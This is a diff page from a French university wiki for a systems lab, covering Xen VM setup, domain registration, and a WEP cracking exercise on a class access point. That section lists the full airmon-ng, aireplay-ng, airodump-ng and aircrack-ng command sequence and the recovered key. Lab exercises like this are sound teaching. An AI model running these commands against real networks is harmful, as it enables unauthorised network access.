TP sysres IMA5sc 2020/2021 G3 : Différence entre versions

De Wiki d'activités IMA
(Cassage de clef WEP d’un point d’accès WiFi)
(Cassage de clef WEP d’un point d’accès WiFi)
Ligne 55 : Ligne 55 :
  
 
  aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518
 
  aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518
 +
 +
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande
 +
 +
airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518
 +
 +
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès
 +
 +
aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518
 +
 +
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP
 +
 +
aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap
 +
 +
et nous obtenons notre clé pour la cracotte03
 +
 +
KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ]
 +
Decrypted correctly: 100%
  
 
=== Exploitation de failles du système ===  
 
=== Exploitation de failles du système ===  

Version du 15 octobre 2020 à 10:21

TP PRA - SIMONIN/MERTZ - Clavaire

Informations générales

Hostname : Clavaire
IP local : 100.64.0.25/28
IP publique : 193.48.57.178/28
URL : clavaire.site

Installation VirtualMachine

Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info

xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster

Lancement de la VM puis connexion :

xl create -c /etc/xen/clavaire.cfg
xen console clavaire

Pour quitter la VM : CTRL + ]

On ajoute des disques à notre VM :

//rename disque et formatage (lvrename/mkfs)

//modif .cfg pour ajouter disques

//transfert fichier /var vers nouvelle partition

//ajoute au /etc/fstab les disques

//mount -a

Tests d’intrusion

Cassage de clef WEP d’un point d’accès WiFi

Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.

Dans un premier temps nous avons annalysé nos interfaces avec

airmon-ng

Le résultat obtenue est

PHY	 Interface	Driver		Chipset
phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370

Nous obtenons ainsi l'interface de la clé WI-PI. Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.

airmon-ng start wlx40a5ef0f6518 3

Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.

aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande

airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518

En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès

aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518

Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP

aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap 

et nous obtenons notre clé pour la cracotte03

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] 

Decrypted correctly: 100%

Exploitation de failles du système

Cassage de mot de passe WPA-PSK par force brute

Attaque de type "homme au milieu" par usurpation ARP

Intrusion sur un serveur d’application Web

Site Web

Achat de clavaire.site[1] sur gandi

Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.